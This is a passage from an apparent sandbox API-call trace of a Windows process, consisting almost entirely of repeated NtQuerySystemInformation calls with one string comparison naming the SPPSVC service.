SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0230.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd730, Length=0x20, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0230.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0230.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4e0, Length=0x28, ResultLength=0x0) [0230.240] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0230.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0230.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0230.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0230.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0230.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, 